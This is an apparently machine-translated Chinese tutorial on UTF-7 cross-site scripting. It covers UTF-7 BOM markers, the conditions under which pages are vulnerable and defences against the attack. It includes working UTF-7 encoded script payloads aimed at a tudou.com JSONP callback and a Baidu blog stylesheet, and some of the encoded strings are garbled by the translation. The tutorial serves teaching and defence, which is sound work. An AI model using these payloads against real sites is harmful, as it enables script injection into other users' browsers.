Utf-7 xss paper

After a day, I finally completed one of the assignments assigned by Master (hiphoph4ck ~

<Thanks to d4rkwind and 5up3rh3i articles>

<Thanks to the guidance of d4rkwind, Master (hiphoph4ck), and 5up3rh3i.>

<You are welcome to point out that the writing is incorrect or not rigorous.>

 

----------------------------------------- UTF-7 XSS Paper -----------------------------------------

 

*****************

0x01. What is a UTF-7?

**************************************** ***************

UTF-7 (7-bit Unicode conversion Format (Unicode Transformation Format, abbreviated as UTF) is a variable length character encoding method,

It is used to present Unicode characters in an ASCII string and can be applied to applications such as email transmission.

Wiki-URL: http://zh.wikipedia.org/zh-cn/UTF-7

 

<1> you can set @ charset = utf-7 to utf-7 encoding by setting

<2> utf-7 bom can be set to utf-7 encoding by setting the beginning of the body

 

Utf-7 bom currently knows 4

+/V8 | +/v9 | +/v + | +/v/

**************************************** ************************************

 

**********************

0x02. Target

**************************************** **************************************** *****

What are the characteristics of utf-7 compared to other character sets?

<1> It is encoded with ASCII printable characters, which is very useful for large-scale filtering detection.

<2> bom is available, and some other character sets do not exist, which greatly improves the utilization probability.

 

Utf-7 can attack targets

<1> http response is not strictly set, for example, Content-Type: text/html

<2> the character set is not specifically specified and is fuzzy.

<3> <meta> the tag has the opportunity to set character sets.

 

Steps to attack with utf-7

<1> obtain the priority of the utf-7 character set by various means, so that the utf-7 encoding can be decoded.

Common methods are:

Set bom flag in the body

Set character set before <meta>

When a webpage encounters a default character set (no special character set is specified), it competes through the encoding format

 

<2> because of the characteristics of utf-7 coding, the vast majority of filtering detection can be escaped, and then with the conventional XSS Method

The simplest thing is to encode <and>, and most websites simply transfer or filter the two symbols.

**************************************** **************************************** *************

 

************************

0x03. How to Use demo or instructions

**************************************** **********************************

Reflected XSS:

[Json-utf-7 xss]

<Format> http: // xx/... callback = [utf-7 header] [utf-7 data stream]...

A json callback of tudou dug by heige

Http://www.tudou.com/my/channel/item.srv? Icode = enQCgQKJTDs & amp; callback = % 2B % 2Fv8

% 20% bytes

AMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg-% 20 xsadas

[Utf-7 header]-> % 2B % 2Fv8 (+/v8)

[Utf-7 data stream]-> % 2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUA

CgB0ACgAMQApADsAP

AAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg-

[After decoding utf-7 data]->

 

Stored XSS:

[Baidu custom css utf-7 css]

<Format> the css body must start with a [utf-7 header], and the [utf-7 data stream] can be any location of the body after the [utf-7 header]

Css utf-7 xss in black blog

Http://hitn.bdimg.com/hi_heige/css/item/2792357ee092f60829388a60.css

Css body content:

--------------------------------------------------------------------

+/V8

# Phx {FILTER: Alpha (Opacity = 100, FinishOpacity = 10, Style = 2, StartX = 20, StartY = 40, FinishX = 0, FinishY = 0) gray (); WIDTH: 220px;

HEIGHT: 32px}

...

Body {background: # FFFFFF; font-

Family: + AHgAJwA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoACgAdwBpAG4AZABvA

HcALgByAHIAcgA9AD0AMQAp

AD8AJwAnADoAZQB2AGEAbAAoACcAcgByAHIAPQAxADsAZQB2AGEAbAAoAGEAbABlAHIAdA

Aoac8asabhaacab5acaatgbl

Ahcaiabzaguayqbyaceaiab0aggaeaag0ayqbyagkabwauac8akqapadsa1_apack

AOwBmAG8AbgB0AC0AZgBhAG0Aa

QBsAHkAOgAnA -;}

...

--------------------------------------------------------------------

[Utf-7 header]-> % 2B % 2Fv8 (+/v8)

[Utf-7 data stream]-> + AHgAJwA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoACgAdwBpAG4AZABvAHc

ALgByAHIAcgA9AD

0AMQApAD8AJwAnADoAZQB2AGEAbAAoACcAcgByAHIAPQAxADsAZQB2AGEAbAAoAGEA

Bablahiadaaoac8asabhaacab5a

Caatgblahcaiabzaguayqbyaceaiab0aggaeaag0ayqbyagkabwauac8akqapad

SAJwApACkAOwBmAG8AbgB0AC0AZgB

HAG0AaQBsAHkAOgAnA-

[After decoding utf-7 data]-> x; xss: expression (window. rrr = 1 )? : Eval (rrr = 1; eval

(Alert (/Happy New Year! Thx mario./); font-family:

**************************************** *********************************

 

********************

0x04. Solutions

**************************************** *****************************

To defend against utf-7 xss, just prevent the utf-7 character set from being recognized.

Utf-7 can be used mainly in two ways

<1> set character set to utf-7

<2> set the utf-7 bom at the beginning of the text

 

See what the above utf-7 can attack

<1> http response is not strictly set, for example, Content-Type: text/html

<2> the character set is not specified.

<3> <meta> the tag has the opportunity to set character sets.

 

Push back defense

<1> strictly set http response. For example, json must be set to Content-Type: "json", otherwise it will be attacked by callback.

<2> set the character set in the development stage to avoid being snatched from the priority list.

If the character set (such as css) cannot be set first, insert the body into a space or invalidate the utf-7 bom.

<3> do not set the character set before the <meta> tag.

 

Demo:

<1> for example, data like storage should be filtered and purified to prevent the appearance of utf-7 bom.

Just like baidu forces a space to be inserted in the first position of the custom css

To avoid disrupting the data that the user wants to express, you can insert a space or

 

<2> the json format is attacked and can be processed in the body.

Http://apps.hi.baidu.com/dashan/data/status? Asyn = 1 & callback = [utf-7 header] [utf-7 data stream]...

For json scenarios, you also need to set header: Content-Type: "json" (The format seems to be incorrect, indicating that this means that)

Or insert a space or

**************************************** **************************************** ***************

Most people are relatively lazy ~ Do not want to search by yourself

Just give some good references ~

Http://openmya.hacker.jp/hasegawa/public/20071107/s6/h6.html? File1_datae.txt (operate right and right by the direction key)

Http://openmya.hacker.jp/hasegawa/security/utf7cs.html

Http://secdocs.lonerunners.net/documents/details/2056-xss-lightsabre-techniques-using-hackvertor

Tomorrow, I have to tangle with the Noop bird == ~ ~